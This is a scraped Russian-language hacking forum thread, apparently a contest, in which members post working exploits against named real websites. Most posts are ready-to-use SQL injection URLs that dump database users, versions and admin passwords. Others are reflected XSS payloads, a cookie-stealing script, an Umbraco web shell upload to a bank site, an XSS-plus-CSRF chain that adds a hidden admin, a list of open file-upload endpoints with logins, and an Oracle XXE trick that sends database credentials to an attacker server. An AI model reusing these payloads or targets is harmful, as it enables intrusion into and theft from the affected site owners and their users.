Windows 2008 R2 or 7
ASP.NET, Microsoft IIS 7.5
MySQL 5.0.12
DBA: False
PS
http://www.trendy.dk/news/readnews.php?id=999999+union+select+1,2,user(),dat abase(),version(),6
White Raven
23.10.2015, 17:53
http://www.automodern.by (http://www.automodern.by/index.php?id=171)
1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS
http://www.automodern.by/wordpress/?s=">alert('xss')&=Search
2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL
http://www.automodern.by:80/index.php?id='
ссори я новичок.
White Raven said:
↑ (https://antichat.live/posts/3906067/)
http://www.automodern.by (http://www.automodern.by/index.php?id=171)
1) Parameter s in /wordpress/?s=&=Search is vulnerable to ">alert('xss') XSS input. уязвимость XSS
http://www.automodern.by/wordpress/?s=">alert('xss')&=Search
2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL
http://www.automodern.by:80/index.php?id='
ссори я новичок.
http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--
White Raven
23.10.2015, 19:34
↑ (https://antichat.live/posts/3906099/)
http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--
я не понял какой код писать что писать уязвимость нашел вроде
Shubka75
24.10.2015, 10:59
Сайт: www.pc-infopratique.com (http://www.pc-infopratique.com)
Уязвимость: SQLi
Эксплоит:
www.pc-infopratique.com/rss/down_rss.php?rub=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34--
Сайт: http://www.wrekage.org/
Уязвимость: SQLi
http://www.wrekage.org/reviews.php?id=-1/*!50000union*//*!50000select*/1,/*!50000version()*/,3,4,5,6,7--
Сайт: http://www.rochesterlancers.com/
Уязвимость: SQL injection
http://www.rochesterlancers.com/schedule/?season=10+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,version(),17,18,19,20,21,22,23,24,25,26, 27,28,29,30--
Сайт: https://www.silhouettedesignstore.com/
Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))
https://www.silhouettedesignstore.com/designs?search='"-->alert(123)
там же Frame Injections
https://www.silhouettedesignstore.com/designs?search=
Сайт: http://getbitco.com/
Уязвимость: Reflected XSS
http://getbitco.com/?ans=Erroralert(123456789)
Сайт: http://http:/bitganancias.com/
Уязвимость: XSS
HTMLFormElement.prototype.submit.call(document.for ms[0]);
Jup1ter_
27.11.2015, 12:54
SQLi
http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n(),5,6,7 (http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,versio n%28%29,5,6,7)
http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version(),2 ,3,4,5,6 (http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version%28% 29,2,3,4,5,6)
http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n(),4,5,6 (http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,versio n%28%29,4,5,6)
Сайт: http://www.academyplazahotel.ie/
Уязвимость: Reflected XSS
http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)
Сайт: http://www.cleanrooms-ireland.ie
Уязвимость: Reflected XSS
http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)
там же: (?redirect?)
http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
Сайт: http://forums.somethingawful.com
Уязвимость: Reflected XSS
http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)
Сайт: http://www.zoommoola.com
Уязвимость: Reflected XSS
http://www.zoommoola.com/?ref='"-->alert(1234567890)
Сайт: http://www.usatestprep.com
Уязвимость: Reflected XSS
http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)
Сайт: http://txbra.org
Уязвимость: XSS
HTMLFormElement.prototype.submit.call(document.for ms[0]);
Jup1ter_
02.12.2015, 15:15
Конкурс уже не актуален?
http://www.tontomarine.co.uk/boat.p...4,5,version(),7,8,9,0,11,12,13,14,15,16,1 7,18 (http://www.tontomarine.co.uk/boat.php?product_id=1+union+select+1,2,3,4,5,versi on%28%29,7,8,9,0,11,12,13,14,15,16,17,18)
актуален, времени пока нет разгрести. позже всем добавлю
Octavian
31.12.2015, 20:41
Remote Code Execution
Сайт: ecb.md
Эксплоит:
POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/..\\..\\..\\umbraco\\shell.aspx
string
Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию
1
Заливается тут ecb.md/umbraco/shell.aspx
chatanti
01.01.2016, 01:15
зашел на ecb.md, стало страшно, ушел)
Octavian
01.01.2016, 01:19
↑ (https://antichat.live/posts/3934680/)
зашел на ecb.md, стало страшно, ушел)
Месныи банк )
BabaDook
04.01.2016, 16:00
↑ (https://antichat.live/posts/3935896/)
Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection
http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6
к сожалению дальше не раскрутил.
Вы уже всё сделали
http://www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(), 5,6+--+-
Сайт: www.normatech.it/login-admin.asp (http://www.normatech.it/login-admin.asp)
Уязвимость:SQL injection
login: ' or '1'='1
pass: ' or '1'='1
AAI,
.SpoilerTarget" type="button">Spoiler
SQL Инъекции1 (https://antichat.live/threads/21336/page-544/)
SQL Инъекции2 (https://antichat.live/threads/424558/page-2/)
↑ (https://antichat.live/posts/3936668/)
AAI,
Spoiler
SQL Инъекции1 (https://antichat.live/threads/21336/page-544/)
SQL Инъекции2 (https://antichat.live/threads/424558/page-2/)
Парю проверять! Спасибо.
nordwarrior
22.01.2016, 23:46
SQL-i, обход mod_security
http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NA ME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
lastbyte
17.02.2016, 17:28
Сайт: https://api.lever.co
Уязвимость: отраженный xss
Эксплойт: https://api.lever.co/v0/postings/lever?mode=iframe&resize=javascript:window.location=alert('xss');// (https://api.lever.co/v0/postings/lever?mode=iframe&resize=javascript:window.location=alert(%27xss%27) ;//)
небольшие проблемы с хостингом и рейтингом, пока восстанавливаю
Octavian
19.02.2016, 23:07
Сайт: http://www.bri.gov.md/panel/login.php
Уязвимость: Отменяем редирект
Эксплойт:
Сайт: http://www.stroika.md/
Уязвимость: SQL injection
Эксплойт:
http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+--+
Сайт: http://www.calidus.ro/
Уязвимость: SQL injection
Эксплойт:
http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FR OM+users
Сайт: http://lukoil.md/ro/search_result
Уязвимость: SQL injection (Post SQL-inj в поиске)
Эксплойт:
-1' UNION SELECT 1,2,user(),4,5,6 --
Сайт: http://mobile.airmoldova.md/
Уязвимость: SQL injection
Эксплойт:
http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,1 1,12,13,user_password,15,16,17,18,19,20,21,22,23,2 4,25+FROM+users+--+
Сайт: http://www.infocom.md/
Уязвимость: SQL injection
Эксплойт:
http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),versi on()+--+
Сайт: http://investigatii.md/
Уязвимость: SQL injection
Эксплойт:
http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),use r(),5,6,7,8,9,database(),11,12,13,14
BabaDook
06.03.2016, 23:17
Невидимая ЭскуЭль инъекция
http://parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-
АштиМиЭль Всовывание
[PHP]
[COLOR="#0000BB"]http:[COLOR="#FF8000"]//shops.ixi.ua/goods.php?goods=hello
mir
select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;
Возникает следующая ошибка:
ORA-31020: The operation is not allowed,
Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:
ncat -lvp 80
Ncat: Version 6.25 (
http://nmap.org/ncat
)
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;
После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:
СКРИН НЕ ВЫХОДИТ ЗАЛИТЬ ХЗ МОЖЕТ ПРАВ НЕ ХВАТАЕТ ....
Тема для Wordpress
Avada #1 Selling Theme of All Time (190,000+ Satisfied Customers (http://avada.theme-fusion.com/))
inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) (https://www.google.com/search?q=inurl%3A"product_orderby"))
./includes/woo-config.php
if ( isset($_SERVER['QUERY_STRING'] ) ) {
parse_str($_SERVER['QUERY_STRING'],$params);
}
$order= ! empty($params['product_order'] ) ?$params['product_order'] :'desc';
$order=strtoupper($order);
$args['orderby'] ="sum_of_comments_approved DESC, average_rating{$o rder},$wpdb->posts.post_date DESC";
Получается Time-Based Blind SQL Injection:
http:// site.com/shop/?product_orderby=rating&product_order=DESC,CASE+1+WHEN+ASCII(substring(ver sion(),1,1))=53+THEN+SLEEP(0)+ELSE+SLEEP(1)+END+AS C+--+1
В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего,
MagentoDownloader - 1.x
Reflected XSS
./downloader.php:
public functionvalidateAction()
{
...
if (isset($_GET['action']) &&$_GET['action'] =='checkdb') {
$this->_session['host'] =$this->_helper->getPost('host');
$this->_session['username'] =$this->_helper->getPost('username');
$this->_session['database'] =$this->_helper->getPost('database');
...
public functiongetPost($key=null,$default=nul l)
{
if (is_null($key)) {
return$_POST;
}
if (isset($_POST[$key])) {
return$_POST[$key];
}
return$default;
}
...
$this->_helper->printHtmlValidateBlock($this->_session);
...
public functionprintHtmlValidateBlock($sessio n)
{
$host= isset($session['host']) ?$session['host'] :'localhost';
$username= isset($session['username']) ?$session['username'] :'';
$password= !empty($session['password']) ?'******':'';
echo
Database Connection
Database Connection
Host
User Name
User Password
HTML;
echo$this->printHtmlButtonSet(array('checkdb'=>'Check for InnoDB support'));
echo
HTML;
}
FPD
[QUOTE="None"]
Warning: PDO::__construct(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/downloader.php on line 191
Warning: PDO::__construct(): [2002] php_network_getaddresses: getaddrinfo failed: Name or service not known (trying to connect via tcp://">[/COLOR]_connection= newPDO($dsn,$username,$password);
} catch (PDOException $e) {
$this->addError('Access denied for user '.$username.' @'.$host);
}
return$this;
}
[/COLOR]
[/PHP]
↑ (https://antichat.live/posts/3971297/)
sql inj
сайт dogarchive.kennel-apbt.com
называется найди уязвимость)?
читайте правила оформления постов
Сайт: http://pedigree.gamedogs.cz
Уязвимость: SQL Injection
http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,1 1,12+--+s
10.0.23-MariaDB-0+deb8u1 (http://pedigree.gamedogs.cz/10.0.23-MariaDB-0+deb8u1)
Octavian
26.04.2016, 16:37
Саит http://www.francophonie.utm.md/
Уязвимость: SQL Injection
Сплоит http://www.francophonie.utm.md/?mop=15&idnews=15+union+select+1,2,3,user(),5,version(),7, 8+--+
MaxxWell
26.08.2016, 00:30
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select( @x)from(select(@x:=0x00),(select(0)from(informatio n_schema.columns)where(table_schema!=0x696e666f726 d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@ x,0x3c62723e,table_schema,0x2e,table_name,0x3a,col umn_name))))x),8,9,10,11,12+--+
Тип: SQL Injection.
================================================== ========
http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(selec t(@x)from(select(@x:=0x00),(select(0)from(informat ion_schema.columns)where(table_schema!=0x696e666f7 26d6174696f6e5f736368656d61)and(0x00)in(@x:=concat (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),13,14+--+
Тип:SQL Ijection (вывод в title, Cntr+u)
================================================== ========
http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x: =0x00),(select(0)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x)+--+
Тип:SQL Injection
NonBlizz
28.08.2016, 23:21
ТИЦ:10PR:2
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
Вывод таблиц:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x) from(select(@x:=0x00),(select(0)from(information_s chema.columns)where(table_schema!=0x696e666f726d61 74696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0 x3c62723e,table_schema,0x2e,table_name,0x3a,column _name))))x),9,10,11,12,13,14,15,16+--+
Вывод админа:
ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0 x3,username,password),9,10,11,12,13,14,15,16+from+ heterodrugs.users+--+
Version (5.5.49-cll-lve)
Database (heterodrugs)
User (hetero582016@localhost)
Для простоты действий:
ttp://heteroworld.com/cpanel/
ttp://heteroworld.com/info.php
P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
PoliGroS
14.09.2016, 00:02
↑ (https://antichat.live/posts/3984821/)
http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select( @x)from(select(@x:=0x00),(select(0)from(informatio n_schema.columns)where(table_schema!=0x696e666f726 d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@ x,0x3c62723e,table_schema,0x2e,table_name,0x3a,col umn_name))))x),8,9,10,11,12+--+
Тип:
SQL Injection.
Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
Octavian
26.03.2017, 13:12
Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт
https://www.andys.md/ro/pages/login/
http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
Octavian
03.08.2017, 15:14
2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
tr:last-child{display:none;}">
Почему в логине
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке
http://i.imgur.com/7yNDiONl.jpg
После этого была оповещена администрация которая на 2 день профиксела
↑ (https://antichat.live/posts/4113101/)
2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )
При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)
Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит
tr:last-child{display:none;}">
Почему в логине
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице
Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так
location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке
http://i.imgur.com/7yNDiONl.jpg
После этого была оповещена администрация которая на 2 день профиксела
Очень хорошая демонстрация, как XSS и CSRF на практике применяется.
Octavian
29.08.2017, 21:05
Раскрытие данных
http://www.termosuport.md/admin/
↑ (https://antichat.live/posts/4128994/)
Приветствую форумчане, подскажите пожалуйста нубу, можно ли как-то узнать привязана ли к номеру телефона страница в вк? Соррян за оффтоп, пока не могу отвечать в теме "В контакте".
Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
Octavian
17.09.2017, 22:56
↑ (https://antichat.live/posts/4129245/)
Будь осторожен с этим.
http://s019.radikal.ru/i615/1709/29/b0e205f0d6f4.png (http://radikal.ru)
Зачем
↑ (https://antichat.live/posts/4129263/)
Зачем
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e (http://tool-bar.appspot.com/hash?input=123456)
Я думал, этот хэш все знают наизусть. Смысл его замазывать?)
Octavian
07.10.2017, 19:23
↑ (https://antichat.live/posts/4136275/)
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e (http://tool-bar.appspot.com/hash?input=123456)
Я думал, этот хэш все знают наизусть. Смысл его замазывать?)
бабадука спроси
PS:Сиски тоже видели все но на ютубе их замазывают
Сайт:http://www.vacbanned.com (http://www.vacbanned.com)
Уязвимость: SQL Injection
Эксплойт:
http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
MySQL > 5.0.11
available databases [3]:
information_schema
vacbanned_dev
vacbanned_v2
Octavian
01.11.2017, 01:04
Засунул в инпутах фейка https://wf-code.ru
[CODE]
">img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;
BabaDook
06.12.2017, 14:21
SSRF Подъехала
https://us.hidester.co
.SpoilerTarget" type="button">Spoiler
http://s018.radikal.ru/i505/1712/03/a0c7c6b851dc.png
Кто сможет перейти на другой протокол пишите метод
Octavian
01.02.2018, 23:48
Arbitrary file upload 1.php.asd
http://ecaterix.md/ecaterix.md/kcfinder/browse.php
http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.oonohousing.com/member/user/kcfinder/browse.php
http://www.golfoldcourse.com/kcfinder/browse.php
http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
http://ex-theatreasia.com/kcfinder/browse.php
http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
http://www.urfaposet.com/panel/kcfinder/browse.php
http://www.raksthai.org/asset/kcfinder/
http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
http://hadu.org/kcfinder/browse.php
Гуглом можно насобирать сайтов
Octavian
02.02.2018, 00:04
↑ (https://antichat.live/posts/4179843/)
Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .
Можем загружать PHP фаилы
L:fm_admin
P:fm_admin
http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
erwerr2321
03.04.2018, 20:50
там оно всё дырявое куда не ткни...
писать бесполезно - пишут, что всё починили и всё работает.
.SpoilerTarget" type="button">Spoiler: Onesecurity - unsecure
curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards¶meters%5Btype%5D=z%27 union select 1,@@version--+¶meters%5Bdirection%5D=DESC¶meters%5Bget_active%5D=true"
"Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
BabaDook
08.04.2018, 18:52
.SpoilerTarget" type="button">Spoiler
http://polisk.kiev.ua/prod_download.php?id=1+and+false+UnIoN SELect 1,2,user(),4&ext= (http://polisk.kiev.ua/prod_download.php?id=1+and+false+%55%6e%49%6f%4e%2 0%53%45%4c%65%63%74%201,2,user(),4&ext=)
http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126'' (http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126%27%27)
http://xenon77.com.ua/production_list.php?id=-1+UnIoN+SeLEct+1,2,3,4,user(),6,7,8
http://www.newchemistry.ru/himbases...,table_name,0x3a,column_name))),@))),3, 4+--+- (http://www.newchemistry.ru/himbases.php?ID=-1+UnIoN+SeLEct+1,(select(select+concat(@:=0xa7,(se lect+count(*)from(information_schema.columns)where (@:=concat(@,0x3c6c693e,table_name,0x3a,column_nam e))),@))),3,4+--+-)
karkajoi
10.04.2018, 16:10
↑ (https://antichat.live/posts/4197794/)
XSS
http://www.task.ua/funds/?id=1&language=
alert(123);
+ sql inject
http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
BabaDook
14.04.2018, 18:25
https://www.ecoresurs24.ru/index.ph...+from+InfOrMaTioN_schema.TaBleS limit 51,1 (https://www.ecoresurs24.ru/index.php?&id=-13+UnIon%20SelEcT+TaBle_name+from+InfOrMaTioN_sche ma.TaBleS%20%20%20limit%20%2051,1)
Дальше лень чё та
https://www.livewireindia.com/livehack/
POST
submit=Submit¢re=others&college=1&district=others&email='and extractvalue(0x0a,concat(0x0a,(select user())))+--+-'&mobile=987-65-4329&name=ttiuvuqg&state=6&year=2016&year1=1967
http://shrigangapharmacy.com/details.php?mno=3&pid=-1'union+select+1,1,(select+concat(0x53714c69,mid(( concat(concat_ws(0x04,version(),database(),user()) ,0x01030307)),1,113505))),1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1--+1
BabaDook
23.08.2019, 00:48
https://www.reso.ru/Aux/result.html?action=search&parsedQuery=345&matchesPerPage=5&displayPages=7&index=RESOSiteIndex&searchString=%3Cscript%3Ealert(document.domain);%3 C/script%3E&searchPage=53
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot